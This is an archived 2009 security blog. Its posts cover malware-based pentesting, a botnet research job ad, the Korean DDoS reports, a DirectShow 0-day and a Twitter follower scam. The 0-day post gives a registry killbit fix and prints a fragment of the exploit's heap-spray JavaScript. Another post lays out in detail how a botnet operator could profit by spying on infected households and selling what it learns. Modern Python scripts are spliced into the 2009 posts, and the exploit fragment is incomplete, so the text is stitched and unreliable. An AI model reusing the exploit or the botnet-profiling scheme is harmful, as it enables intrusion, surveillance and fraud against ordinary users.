Sunday, July 19, 2009

Pentest Evolution: Malware Under Control

When I look back at the history of commercial consultancy-based pentesting I see two distinct forks in the road. The first happened around 2000, and the second happened around 2003. But I think another fork is about to crop up.

Prior to 2000, commercial pentesting was almost exclusively focused on the external hacking of an organization's Internet-visible assets. Basically, professional full-time consulting teams (which can probably be traced back to 1994 if you push hard enough) were following a loose pentest methodology (still mostly portrayed as a dark art and only "learnable" via an authoritative mentor) - plugging away with vulnerability scanners and exploiting anything that came up - where the goal was to break in, plant a few flags, and then tell the client what patches and system hardening they needed to catch up on. This core area of pentesting (which is still a distinct suite of offerings and consulting skills today) focuses upon OS and network-level vulnerability discovery and careful exploitation.

The first fork
By 2000 though, simply hacking an IIS or Apache server through an unpatched vulnerability or permissions flaw and throwing up a command script to "root" the server wasn't really cutting it anymore for all these new Web applications. So, the first real "specialist" services started to appear - focused upon assessing the custom Web application itself - independent of the hosting platform. To my mind, that was the first forking of the pentest track. Sure, there were still (and are) security code reviews (dissecting lines of code and hunting for bugs and vulnerabilities) - but I don't class that as "pentesting" as such; that's either auditing or security assessment.

That first fork led to entirely new pentesting methodologies, training regimes and certifications. But, more importantly, it also led to distinct consulting teams - rather than a specialized subset of network skills learned as part of being a pentester. Today, there's so much to learn in the field of Web Application pentesting that to keep at the top of the game you'll never realistically have time to deep-dive more classical OS and network based pentesting.

The second fork
The next fork that altered the fundamentals of pentesting occurred around 2003 with the advent of (and requirement for) specialized reverse engineering skills to "black-box" hack a brand-new commercial software product. Around this time major software vendors were struggling in their battles against blackhat hackers and the full disclosure movement - even the news media was keeping count of the vulnerabilities - and customers were scared.

The solution came from specialist pentesting consulting organizations that had established a name (and reputation) based upon their ability to discover/disclose new vulnerabilities. It was a simple business model - find new bugs in all the software that prospective customers use, tell the media you found some bugs, get recognized by prospective customers as being "elite" pentesters, and turn the "prospective" into "loyal" customers.

I identify 2003 as the year that specialized bug-hunting and security reverse engineering services started to appear as commercial consulting offerings, and the first real widespread traction as software vendors began to procure this specialized consulting.

The skill-sets are (again) quite distinct from any other arm of pentesting. While knowledge of the other two pentesting regimes is valuable (i.e. Network/OS pentesting and Web Application pentesting), it takes a different mind and training to excel in the area of security reverse engineering. While you could argue that some of the best "classical" pentesters had many of the skills to find and exploit any new bugs they stumbled across during a client engagement - it wasn't until 2003 that these services really became commercial offerings and sales teams started to sell them.

The impending fork?
Which all leads me to point out a probable new fork in the pentesting path - specialist malware and its employment in pentesting. Why?

It seems to me that we've reached a time where formalized methodologies and compliance mandates have pretty much defined the practical bounds of commercial pentesting (Network/OS, Web application and Reverse Engineering), and yet there is a sizable security gap. And that gap firmly lies within the "prove it" camp of pentesting.

What I mean by that is, as any savvy pentester will tell their customer, the pentest is only as good as the consultant and the tools they used, and is only valid for the configuration tested and the date/time of testing. No guarantees or warranties are implied, and it's a point-in-time test. And, on top of all that, the scope of the pentest has typically been narrowly defined - which means that you end up with phrases like "system was out of scope...", "...not all patches were applied", "...not allowed to install tools on the compromised host", etc., appearing in the final reports handed to the customer.

But, with the greater adoption/deployment (and availability) of technologies such as IPS, firewalls, ADS, Web filtering, mail gateways, host-based protection, DLP, NAC, etc. and the growing strictness (and relevance) of compliance regulations, those classic limitations of pentesting methodologies leave vacant the "prove it" - prove that those technologies are really working and that the formal emergency response systems really do work.

This is where I think a new skill set, mindset and pentesting methodology is developing - and is an area which I expect to see develop into commercial offerings this year.

Pentesting with malware
What I envision is the requirement for specialised security pentesting offerings that focus upon developing new "malware" and "delivery systems" designed to not only test the perimeter defenses of an enterprise, but also every layer of their security system in one go.

I don't think it's enough to say "drive-by-downloads are a fact of life and all it takes is one unpatched host to browse a dangerous site to infect our network. But that's OK because we have anomaly detection systems and DLP, and we'll stop them that way". Prove it!

Given the widespread availability of DIY malware creation kits, and the staggering array of tools that can pack, crypt, armour, obfuscate and bind a custom malware sample - and make it completely invisible to any anti-virus technology deployed within an enterprise - I expect that there will be a demand for pentesting to evolve and encompass the use of "live" malware as a core pentest consultancy offering.

For example, does the customer's enterprise prevent users from browsing key-munged web sites (e.g.,, etc.)? Which browser plugins are installed and not fully patched? Can malicious URLs and zipped malware make it through the mail gateways? Can the host-based security package detect keyloggers and network sniffers? If a malware package starts to scan and enumerate the local network from an "infected" host, is it detected, and how fast? What types of data can be exported from an infected host? Does compression and encryption of exported data get detected by the DLP solution? Does the malware have to be "proxy-aware" and require user authentication? Is out-of-hours activity detected from an "infected" host? Is it possible to "worm" through the enterprise network and "infect" or enumerate shared file systems and servers?

All of these questions, and many more, can be answered through the deployment of specialized malware creations and focused delivery techniques. The problem though is that this is an untapped fork in the pentesting road, requiring new mindsets - particularly with enterprise security teams.

The bad guys are already exploiting enterprises with custom malware, yet it's generally taboo for consultancies to test security using similar methods. To my mind, that means that a new pentesting specialization is now required to deliver the expertise needed by enterprise businesses to really test their security against today's threat spectrum.

Malware pentest anyone?

Monday, July 13, 2009

Senior Research Analyst Role(s) Now Available

Just a quick note to say that I've got a couple of open security jobs going for Senior Research Analysts over at Damballa. I'm looking for a couple of folks that like living on the cutting-edge of security.

You can submit your resume on the company portal HERE if you're interested in getting elbow-deep with botnets.

Below is the job description...

Job Specification: "Senior Research Analyst"
Internet security is evolving at an increasingly rapid pace. As the thrust and parry of attack vectors and defensive tactics force technologies to advance, the biggest security threat now facing enterprise organizations lies with botnets. The Damballa Research team spearheads global threat research and botnet detection innovation.

Damballa’s dedicated research team is responsible for botnet threat analysis and detection innovation. From our Internet observation portals, and using the latest investigative technologies to intercept and capture samples, the research team studies the techniques employed by criminal botnet operators to command and control their zombie hordes – mapping their spread and evolution – and developing new technologies to both detect and thwart the threat.

As a Senior Research Analyst you would be part of the team responsible for providing the threat knowledge that powers the core technologies of Damballa’s products – working on advanced pattern detection algorithms, massive data collection and analysis solutions, prototyping new detection systems, and advancing large-scale applications that deliver actionable threat intelligence.

The rapid evolution of the threat means that, as a Senior Research Analyst, you will also need to be able to deep-dive into the botnet masters' lair – turning over the rocks they hide under and visiting the online portals they do their business in – and be capable of analyzing the evidence of their passing. A key to being successful in this role is the ability to provide internal departments with comprehensive intelligence on malicious software (malware) behavior as it pertains to Botnets and other targeted threats – and to be able to communicate the threat in a clear and concise manner.

Collaborating with the marketing and engineering teams, the Senior Research Analyst will typically need to design and construct analysis tools that automate the extraction of botnet intelligence and make it available to the company’s other technologies and its knowledgebase as well as responding to ad-hoc requests for malware analysis driven by business and client needs to determine characteristics, functionality, and/or recommend countermeasures.

The position may entail interaction with the media following the successful outcome of directed research or response activities.

  • Independent threat analysis and data mining of new botnet instances
  • Research into new methods for detecting and reporting botnet activities
  • Dissection of new botnet samples and the automation of sample processing
  • Investigation of new botnet command and control tactics and subsequent enumeration of botnet operators
  • Focused analysis of botnet outbreaks within enterprise and ISP networks
  • Contribution to research and commercial papers describing the evolving botnet threat
Skills & Experience:
  • Experience as a security engineer, threat intelligence analyst, or similar senior technical role
  • Extensive knowledge of tracing and debugging Windows processes in the context of malware reverse engineering
  • Proficiency with C/C++ programming and x86 assembly/disassembly
  • Deep understanding of network flow data analysis, deep packet inspection and network behaviors of malicious software
  • Comprehensive knowledge of anti-debugging and anti-instrumentation techniques
  • Familiarity with packing and anti-reverse engineering techniques, including data obfuscations that employ primitive or basic cryptography
  • Ability to troll underground Internet forums and criminal sites/portals for new botnet intelligence
  • BS or MS in Computer Science or equivalent industry experience
  • Good understanding of TCP/IP networking and security
  • Proficient in multiple compiled and scripting languages (Perl, Python, Ruby, Java, C, etc.)
  • Proficient with Unix (Linux preferred) development and production environment
  • Proficient query design in relational databases (Postgres/pgsql preferred)
  • Excellent formal communication and presentation skills
  • Ability to read and translate multiple international languages a bonus
Note: The roles are ideally based in Atlanta. If you're having trouble with the online form (or need to check to see if your resume arrived safely), you can always try to drop me an email at my work address of 'gollmann-at-damballa-dot-com' - but don't bother to do so if you're an agent or representing someone else (those emails will go straight to the deleted items).

Sunday, July 12, 2009

Root of all Evil Kicks off Cyber War...

It's been a ridiculous week reading the papers about the pitched battle that North Korea has kicked off against the USA and South Korea. Those juggernauts of the internet have supposedly begun a 21st century cyber war... or so some politicians would have you think. Oh, and "we" have to retaliate too.

Nature abhors a vacuum, and it looks like more than a few heads have been filled with cyber-war nonsense.

I blogged on Friday about the topic on the Damballa site (and I've reposted it below), but I forgot to mention much about the DDoS threat angle. In a nutshell, DDoS is a common occurrence across the internet. Major web sites - particularly government and international conglomerates - are constantly under DDoS attacks of some degree or other. Unfortunately it's just a fact of Internet life nowadays - a bit like Spam taking up 80+ percent of email traffic.

What about the major sites that got hit and went down? Unfortunately, this too is an ongoing problem. As the bandwidth available to home Internet users increases, the number of hijacked connections needed to take out big corporate Internet pipes gets lower and lower. While it's true that the sites under attack can work on mitigation strategies to prevent (or more likely reduce) the outages due to DDoS - they are increasingly reliant upon upstream ISPs to do the real work in preventing the attack. The strength of that relationship is evident in the speed of response to DDoS attacks.

Let's face it though - if only 10% of the world's computers outside of the US decided to initiate a coordinated DDoS attack against any site or organization in the USA, that site will be toast. Volume trumps network security magic.

Reposting -

North Korea Kicks-off DDoS Cyber War?

For all the headlines these last few days you’d have thought cyber-war had kicked off and we’re on the cusp of Armageddon. Depending upon which news channel you’ve been listening to or which newspapers you’ve been skimming you could have hardly missed this latest nonsense that North Korea has instigated a cyber war against the USA and South Korea. It’s even got to the point that I’ve had to get on the TV myself and try to explain the situation.

As such, I spent a few minutes this afternoon on CNN International News talking about these supposed North Korean cyber-attacks – trying to correct some of the madness that the conspirators and ill-informed have been spouting.

Here’s a 20 second summary of what’s been happening in the news:

  1. On July 4th, a handful of US websites (5) came under DDoS attack from a botnet consisting of a high proportion of bot agents (i.e. victims) based within South Korea.
  2. Initial estimates placed this particular botnet at about 20,000 agents.
  3. Over the following days the list of targeted web sites grew to 26, with a mix of US and South Korean sites.
  4. The targets were a mix of government, financial and news media Web sites – more heavily weighted towards government sites.
  5. The bot agents were launching a mix of HTTP GET requests, UDP packets and ICMP ECHO requests at each listed target – repeatedly cycling through the list in a round-robin fashion. Depending upon the victim computer being used, this could represent around 100 “attacks” per second.
  6. Estimates of the botnet size range from 20k through to 100k – with most public news media estimating the size to be 50-60k bot agents.
  7. Some Web sites didn’t cope well with their unwanted DDoS traffic and went down for a period of time – most noticeably the FTC Web site.
  8. The bot agent in use (and the samples Damballa has collected) is based upon MyDoom – a worm-based bot agent dating back to 2004.

  9. Oh, and the biggie: it seems that a number of politicians have jumped on to this DDoS and portrayed it as the first foray into cyber-war by North Korea… we’re all doomed… and, since this is an act of war, “we” need to strike back!
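As an added illustration (my own example, not Damballa tooling and not part of the original post), here is a small flow-analysis script that flags a source behaving like the agents in item 5: cycling round-robin through a fixed target list with a mix of HTTP GET, UDP and ICMP at around 100 flows per second. The flow records and target names are constructed placeholders, and the thresholds are assumptions.

```python
from collections import defaultdict

# Constructed target list and protocol mix; placeholder names, not the real
# sites from the July 2009 attack.
TARGETS = ["gov-1.example", "gov-2.example", "news-1.example",
           "bank-1.example", "gov-3.example", "news-2.example"]
PROTOS = ["http_get", "udp", "icmp_echo"]


def build_sample_flows():
    """Constructed flow records (timestamp_s, src, dst, proto) for three
    sources: a bot agent cycling through TARGETS with HTTP GET, UDP and
    ICMP at ~100 flows/s, an ordinary browsing host, and a single-protocol
    crawler hammering one site."""
    flows = []
    # Bot agent: three flows (one per protocol) at each target, then move on.
    for i in range(300):
        target = TARGETS[(i // len(PROTOS)) % len(TARGETS)]
        flows.append((i * 0.01, "10.0.0.5", target, PROTOS[i % len(PROTOS)]))
    # Ordinary host: a few HTTP requests to three sites over a minute.
    visits = ["news-1.example", "mail.example", "shop.example",
              "news-1.example", "shop.example", "mail.example"]
    for n, dst in enumerate(visits):
        flows.append((n * 10.0, "10.0.0.7", dst, "http_get"))
    # Crawler: high rate, one destination, one protocol.
    for n in range(200):
        flows.append((n * 0.01, "10.0.0.9", "news-2.example", "http_get"))
    return flows


def round_robin_cycle(dsts, min_targets):
    """Return the repeating target list if the destination sequence is a
    strict round-robin over at least min_targets distinct hosts, else None."""
    # Collapse consecutive repeats so a multi-protocol burst at one target
    # counts as a single visit.
    collapsed = [d for n, d in enumerate(dsts) if n == 0 or dsts[n - 1] != d]
    try:
        period = collapsed.index(collapsed[0], 1)
    except ValueError:
        return None                     # first target never revisited
    cycle = collapsed[:period]
    if len(set(cycle)) != period or period < min_targets:
        return None                     # repeats inside a cycle, or too short
    if any(d != cycle[n % period] for n, d in enumerate(collapsed)):
        return None                     # order drifts: not strict round-robin
    return cycle


def analyze(flows, min_targets=5, min_rate=50.0, min_protos=2):
    """Group flows by source and flag sources whose traffic matches the
    round-robin, multi-protocol pattern. Returns {src: finding}."""
    by_src = defaultdict(list)
    for ts, src, dst, proto in flows:
        by_src[src].append((ts, dst, proto))
    findings = {}
    for src, recs in by_src.items():
        recs.sort()
        span = recs[-1][0] - recs[0][0]
        rate = len(recs) / span if span > 0 else float(len(recs))
        cycle = round_robin_cycle([dst for _, dst, _ in recs], min_targets)
        protos = sorted({proto for _, _, proto in recs})
        if cycle and rate >= min_rate and len(protos) >= min_protos:
            findings[src] = {
                "targets": cycle,
                "protocols": protos,
                "flows_per_second": round(rate, 1),
                # Spreading one source's output over N targets dilutes what
                # each target actually receives.
                "per_target_share": round(rate / len(cycle), 1),
            }
    return findings


if __name__ == "__main__":
    for src, finding in analyze(build_sample_flows()).items():
        print(src, finding)
```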

So, let me try to inject some sanity into all this madness and, in my best Scouser accent, shout “calm down, calm down!”

While a lot of the analysis is still ongoing – and likely to continue long after the public loses interest – I’ve come to the conclusion that this DDoS attack has very little to do with North Korea and only conspiracy theorists could conclude that this is a state-sponsored kick-off to cyber-war. Why not?

  1. The bot agents being used in this attack are ancient. They’re not stealthy, they have limited attack capabilities, they’re detectable by just about every anti-virus product out there (and have been for over half-a-decade), and it makes no sense for any professional to use them – even if they were handed over as a freebie. We’re not even talking about someone taking the cyber-equivalent of arming a few farmers with 40 year-old AK-47s, it’s more like arming a troupe of girl-scouts with water-balloons and Nerf guns.
  2. The DDoS attacks came from bot victims scattered around the globe – with perhaps the highest concentration in South Korea. As far as I’m aware, there was no noticeable collection of bot agents from North Korea. In fact it even looks like the command and control servers for this botnet weren’t even based in the region – and were most likely compromised already.
  3. The list of targets doesn’t make sense. Sure, a handful of the Web sites have some significance from a government perspective – but they’re only Web sites, and nothing special happens there. If you’re going to target a nation’s infrastructure and cause any level of pain, “these are not the droids you are looking for”.
  4. The fact that the list grew over multiple days and only leached over to include some South Korean sites later suggests to me that the “mastermind” behind this attack is more likely to be some crazy South Korean college student who thought it would be cool to strike out at the US – then told some of his mates over the weekend what he was doing – and subsequently ended up following their advice to include some additional sites that would be “cool” to throw sticks at. Then, on the last night, they all grabbed a few beers and decided to chuck in a few local Web sites for good measure since they’re now making the news (”Hi mom!”).
  5. I’d also have to conclude that the botnet operator(s) are amateurs. A DDoS attack is only successful if you throw enough traffic at a targeted Web server to overwhelm it. To take a (relatively) small botnet and to split its target range over multiple sites means that the per-target attack volume is going to decrease. To split the target pool amongst 26+ Web sites was going to be a wasted effort – and most likely the operator(s) have little understanding of network security and the protocols they were playing with.
    OK, so I hear you say “but some of the US Web sites went down”… yes they did, but early on in the attack. This means two things to me – (a) later on they targeted more Web sites, so the volume of DDoS traffic to the affected sites dipped after a few days, and (b) the system administrators of those Web sites managed to read the first few chapters of “Network Security for Dummies” and actioned the anti-DDoS advice they were given.
  6. Why South Korea? Let me temporarily slip on my blackhat and explain it from a bad-guy’s perspective. Why not? I’m hardly going to launch the DDoS from computers I own or from the place I work. South Korea is known to have a top-notch Internet infrastructure – with most of the population having high-speed Internet access (higher on average than the US) – yet its online population typically has one of the highest infection rates of anywhere in the world. So it’s a great place to build a high-speed botnet from scratch.

OK, so for all those reasons above, I don’t think that this is a North Korean cyber-war. And I also don’t think that North Korean sympathisers have infiltrated South Korea and are masking their attack from within – as suggested by a handful of politicians (wasn’t that some Tom Clancy plot?).

My advice for those politicians and conspiracy pundits out there thinking that cyber-war is upon us by the evil North Koreans – think again. Even if you’re right and this is a state-sponsored attack, then by the nature of the attack exhibited thus far you might as well invest in some umbrellas to avoid the water balloons – rather than consider retaliatory cyber attacks.

Note: I thought the image of Worzel Gummidge was appropriate for this blog. For those unfamiliar with this 1979 TV series – it starred Jon Pertwee of Dr Who fame and his scarecrow character had to change his head whenever he needed to do some thinking…

Monday, July 6, 2009

New 0-day in Microsoft DirectShow

There's news of a new 0-day exploit for Microsoft's MSVidCtl.DLL (DirectShow) doing the rounds. The exploit code is publicly available on several Chinese Web sites - so be careful. There'll be plenty of noise this week concerning this 0-day.

The CSIS site has some details - and I find it disconcerting that there was any expectation that AV would preemptively detect/stop this.

You can help protect against exploitation of this control by setting the killbit for it.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400
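An added check of my own (not from CSIS or Microsoft) that parses an exported .reg file and confirms whether the killbit, bit 0x400 of "Compatibility Flags", is actually set for a given CLSID. It reads .reg text rather than the live registry so it runs anywhere; the sample export is constructed, and the two extra CLSIDs in it are made-up placeholders.

```python
import re

KILLBIT = 0x400  # "Compatibility Flags" bit that stops IE instantiating a control

# Constructed .reg export (not a real system dump). The first CLSID is the
# MSVidCtl control named in the post; the other two are made-up placeholders.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{11111111-2222-3333-4444-555555555555}]
"Compatibility Flags"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{66666666-7777-8888-9999-000000000000}]
"Unrelated"=dword:00000400
"""

COMPAT_KEY_RE = re.compile(
    r"^\[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\"
    r"ActiveX Compatibility\\(\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\})\]$")
FLAGS_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{1,8})$')


def parse_activex_compat(reg_text):
    """Map each ActiveX Compatibility CLSID in the export to its
    Compatibility Flags value (None if the key carries no such value)."""
    flags = {}
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        key = COMPAT_KEY_RE.match(line)
        if key:
            current = key.group(1).upper()
            flags.setdefault(current, None)
            continue
        if line.startswith("["):
            current = None        # some other key: ignore its values
            continue
        value = FLAGS_RE.match(line)
        if value and current:
            flags[current] = int(value.group(1), 16)
    return flags


def killbit_set(flags):
    """True only if the 0x400 bit is present in the flags value."""
    return flags is not None and (flags & KILLBIT) == KILLBIT


def audit_killbit(reg_text, clsid):
    """Report whether the given CLSID is killbitted in the export
    (CLSID comparison is case-insensitive)."""
    return killbit_set(parse_activex_compat(reg_text).get(clsid.upper()))


if __name__ == "__main__":
    for clsid, value in parse_activex_compat(SAMPLE_REG).items():
        print(clsid, "killbit set" if killbit_set(value) else "NOT killbitted")
```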

Details of the exploit are available on the CSIS web site, but are included below:

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;

var headersize=20;

var omybro=unescape(nndx);

var slackspace=headersize+dashell.length;

shuishiMVP=shuishiMVP+shuishiMVP+bZmybr; memory=new Array();
var myObject=document.createElement('object');


Sunday, July 5, 2009

Making Money with Your Own Stealthy Botnet - Part III

So, how can you use a stealthy botnet and milk your victims for all they're worth with the least likelihood of being detected? I've already discussed the vectors of modifying advertising in real-time and pay-per-installs, but what happens if you get more personal?

Sure, we've seen lots of FUD about identity theft and the role botnets play in propagating that threat. The problem with a lot of these "legacy" attacks is that they get noticed pretty quickly and, more importantly, banks and financial institutions have become much better at automatically detecting the money-transfer part of the fraud/theft. Bot-masters embarking down this fraud path have little imagination or grasp of the value of all the other information they could potentially be tapping on each victim host.

If I had a botnet of 50,000 victims and was contemplating a life of crime, an interesting and stealthy route to make money could lie in household profiling.

3. Household Profiling
Consider for a moment the value of an identity. For the last five years the financial/tradeable value of an "identity" has been on the decrease. For example, an "identity" (consisting of name, address, phone number, birth-date, credit card number, card expiry, CCV code and Social Security Number) can be picked up for as little as $0.20 in batches of a thousand, but can rise to as much as $100 if it also includes the victim's online banking credentials.

The problem though is that as soon as the accounts are tapped, the probability of the victim knowing, getting new credit cards, changing online banking details AND having the transaction voided, is practically guaranteed - and there is a high likelihood that the victim will hunt out bot agents on their host - not to mention being hunted down by law enforcement.

So, instead of focusing on this "short gain" fraud, why not embrace the long term - building up a complete profile of the user/family. Most of this concept could be categorized as "spyware", but there could be some tweaks to make it more profitable to the botnet operator.

Let's look at some of the information that I think could be extracted from a family PC infected with a botnet agent capable of keylogging, screen-grabbing, man-in-the-browser, file scanning and encrypted C&C (which is basically every bot agent out there today...):
  1. Household Financial. Does the family have money to spend, and how do they manage their money? Every time a family member logs in to their online banking portal or receives an email, you could grab financial information such as:
    * Household monthly income
    * Total cash savings
    * Monthly spending patterns
    * Long-term savings and retirement plans
    * Stock-holdings and investment profile
  2. Bill Payments. Who supplies the household and how much are they spending? Monitoring online portals and scanning emails (or even VoIP traffic) it would be possible to uncover marketable profile information such as:
    * How much are they spending on utility bills?
    * Which stores do they regularly visit, what do they actually buy, and how much do they spend?
    * Are they up on their payments or behind?
    * Are they and the family in good health? Are they planning/saving for a major operation?
  3. Web Profiling. That holy grail proposed throughout the 1990's of building up a full profile of the family by monitoring their network traffic? Well, it's all possible - but this time not inhibited by bothersome laws. Saleable information such as the following could be extracted:
    * Which sites do they visit, and how long do they spend on them?
    * What are they searching for or likely to purchase shortly?
    * What do their children and grand-parents do? How old are they?
  4. Contact Extraction. By scanning through mailboxes (both locally stored and webmail) along with social networks, gaming and other portals, the bot agent could extract detailed contact information - which in turn can be used for profiling (or infecting) friends.
  5. Affiliations. The monitoring of web traffic and emails will likely also reveal less tangible affiliation information such as religion and social groups.
Now, imagine you can automatically extract, group and sort this information from 50,000 hosts (which for the sake of argument could encompass maybe 40,000 family units and a total of 100,000 personal identities) - how would you make money from it?

Several methods spring to mind:
  • Gray-channel marketing portals. Much of this personal information can be "washed" through the gray-market and be absorbed through a second-tier of marketing channels. While each record subset of information probably doesn't have much value by itself - probably only $0.50-2.00 per record and maybe $1-5 per family - it does have the advantage of being sold to multiple institutions as well as being offered as a "subscription" service. With that in mind, you'd probably be looking at earning something like $200+ per year (less expenses).
  • Targeted Profiled Sales. I've been told many times that it costs somewhere between $50-$200 to attract a new customer and entice them to move to a new utility/service provider. It would be relatively easy to provide profiles of households based upon existing utilities (and what their monthly bills are - along with history of payments) and sell them to competitors. I wouldn't be surprised if you could make $10-20 per "package" - and could net something in the region of $20k per month - by selling that info to commission-based utility sales reps. Sure, that's probably illegal and wouldn't be condoned by the Utility companies themselves, but I suspect quota-based sales would be a reliable vector. With that in mind, perhaps chopping out the middle-man and getting a job as the Utility sales rep directly may be more financially viable.
  • Just-in-time-sales. With sufficient effort, you could probably automate the identification of impending sales events. For example, the lease on the family car has just ended and they're now browsing the web for a 4-door convertible - or perhaps the family are just about to begin planning their summer/winter vacations. Extracting this information, passing it to a local dealer and taking a slice of the eventual sale price would be simple enough. It's probably not high value, but it is low risk.
  • Bulk Contact Sales. If all else fails, there's an existing market for email addresses and other bulk contact details. This type of info is trivial to extract and its source can be easily obfuscated. However, even with 50,000 bots (potentially yielding 1-2m contacts), you're probably only going to make a few thousand dollars per year.
All in all, I think you could maintain a healthy revenue stream from simple household profiling with a relatively low threshold of being detected (and subsequently being thrown in jail). Out of all the botnet revenue models discussed thus far this one would probably be most preferable... so far...

Thursday, July 2, 2009

Take the Twitter Train to Despair and Spamvertizing

I've been watching with interest this "twitter train" phenomenon. Scam of the week...

In a nutshell, a number of websites have been set up under the guise of "twitter train" whereby low-esteem twitter addicts can potentially add hundreds of new followers.

From the website(s):
"Twitter Train is the only place to expand your Twitter followers. It's FREE to join so you have nothing to lose by giving it a go.

When you login you will be taken to a screen with other Twitter users, on here you follow the members and then get added to the front of the train for the next 40 visitors to follow.

Remember VIP members get tons more followers because they stay on the train all day, so make sure you become a VIP member."

Whoah... so to use this follower-building service I have to give them my Twitter authentication details? Oh, and then there's:

"We may use your account to promote our services, with the exception of VIP account."

It's a kind of hybrid pyramid scheme meets password stealer that'll spew out spamvertizing? Are they crazy? Perhaps not. Looking at a couple of different sites ( and -- since has been shut down) you'll see numbers like 3,373,486 and 2,966,814 respectively being depicted as "Total Follows" with close to a combined 1,700,000 VIP follows (i.e. paid-for accounts). There's no guarantee that these numbers are anything real (and I suspect that they aren't) but that's a huge number of potentially stolen/hijacked accounts.

For those suckers (and soon to be victims?) seeking to build up their social cred by dramatically adding followers, do you really know what you're getting into? I hope you don't use the same password on sites beyond Twitter!

An old saying goes..."A fool and his money are easily parted." In this case a fool, his money, his password and his dignity are easily parted.

Don't say you weren't warned. And don't be surprised if you're un-followed as soon as your account starts spewing tweet-spam. Better change your Twitter password before twitter-train does it for you ;-?